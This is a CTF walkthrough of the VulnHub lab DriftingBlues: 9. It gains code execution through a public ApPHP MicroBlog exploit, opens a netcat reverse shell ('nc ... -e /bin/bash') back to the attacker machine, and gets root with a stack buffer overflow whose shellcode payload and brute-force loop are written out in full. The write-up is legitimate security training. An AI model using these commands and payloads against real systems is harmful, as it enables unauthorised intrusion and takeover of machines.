# DriftingBlues: 9 BOOT2ROOT CTF VULNHUB WRITEUP Welcome back to another WriteUp! In this one, I’ll walk you through the step-by-step process I used to solve the Final Machine of DriftingBlues from VulnHub!!! Let's start!!

We'll use `Nmap` to scan for open ports and identify possible endpoints. `nmap -A -p- -T5 192.168.172.235`

Now let's visit the webpage.

Just a classic DriftingBlues Static Page

If you will analyze the Nmap scan carefully, you can see that the webpage is using `ApPHP MicroBlog` . **ApPHP MicroBlog** is a lightweight, PHP-based blogging platform designed for quick setup and simple content management, often used in older web projects or educational setups. While it offers basic features like post creation, categories, and multi-author support, it has become outdated and is rarely used today due to multiple security flaws. Known vulnerabilities in versions like 1.0.1 include **Remote Code Execution (RCE)**, **Local File Inclusion (LFI)**, and **unauthenticated file uploads**, making it highly exploitable. Let's check the source code to determine its version.

Now let’s run `searchsploit` to directly check if there’s a known exploit available for ApPHP MicroBlog. (Sure it has, xD) `searchsploit microblog`

Instant RCE for sure, now let's use `33070` . `searchsploit -m php/webapps/33070.py`

The exploit is written in Python2, the legacy version of Python. `python2 33070.py http://192.168.172.235`

It works, with a Database Credentials in it.

To establish a stable shell, we’ll set up a `Netcat` listener on our attacker machine and have the target system connect back to it. Attacker machine: `nc -lnvp 1234` Target machine: `nc 192.168.172.246 1234 -e /bin/bash` And...

Now that we’ve gained shell access, let’s upgrade it to an interactive shell using `pty` and set the `TERM` environment variable to `xterm`. `python -c 'import pty;pty.spawn("/bin/bash")'` Then `export TERM=xterm` While exploring the home directory, I discovered a user named **clapton**. If you recall from the earlier dumped credentials during the exploit, **clapton's password** was included. So from here, we can switch directly to the **clapton** user. `su clapton`

Next to the user flag, there are also two additional files.

Let's check the note.txt

Alright, it looks like a Buffer Overflow is the main vulnerability here. The input file is likely a compiled binary.

It is, and it's 32-bit. Now let's execute it.

Now let's fill it up with lots of 'A'.

It results in a Segmentation Fault, confirming the presence of a Buffer Overflow vulnerability. To dig deeper into the analysis, I transferred the binary over to my attacker machine. make sure that the `ASLR` is disabled before you take any action. Otherwise, your return addresses will be unpredictable, and your exploit will likely fail. `echo 0 | sudo tee /proc/sys/kernel/randomize_va_space` Let’s now use `GDB` to examine the binary in more detail. `gdb -n ./input`

I input a series of 'A's once more to check if we can take control of the EIP. If the program returns an address like `0x41414141`, it's likely a stack-based buffer overflow.

Let’s use Metasploit’s `pattern_create` to generate our input. `./pattern_create.rb -l 400`

Now let's get the offset of `0x41376641` .

Our offset is `171` . Let's check the value of the ESP register. Because the system uses little endian format, the bytes will appear in reverse order. `x/s $esp`

Our EIP is `0xffffd260` in reverse. `0xffffd260 → 0x60 0xd2 0xff 0xff → \x60\xd2\xff\xff` Now that we have everything we need, we can proceed to craft our payload. `PAYLOAD = OFFSET_VALUE + EIP_VALUE + NOPS + BASH_SHELL_CODE` For the shell code, I used the shellcode in this [exploit](https://www.exploit-db.com/exploits/37495) I've found in exploit-db. ```py \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80 ``` This is our final payload: ``` python3 -c 'print("A" * 171 + "\x60\xd2\xff\xff" + "\x90" * 1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80")' ``` Now let's execute it in our target machine. **Note: GDB is available on the target machine, be sure to repeat the entire process there to accurately obtain the EIP value.** Since we'll be executing it on a different machine where ASLR is enabled by default, we'll run the payload in a loop to increase the chances of success. ```bash for i in {1..10000}; do (./input $(python -c 'print("A" * 171 + "\x00\xbf\xe8\xbf" + "\x90" * 1000 + "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80")')); done ``` The first attempt might failed, just continue executing it. After a long time....

We're root!!!

We've successfully pwned DriftingBlues: 9 and completed the DriftingBlues Series!!! The **DriftingBlues** series has been an incredibly enjoyable and insightful experience — starting from cronjob privilege escalation techniques to diving deep into buffer overflow exploitation. Each challenge offered a valuable learning opportunity, showcasing different aspects of Linux privilege escalation, exploitation techniques, and system misconfigurations. It’s a well-rounded series that not only tests your technical skills but also sharpens your mindset as a security researcher or CTF player. I highly recommend it to anyone aiming to strengthen their foothold in offensive security.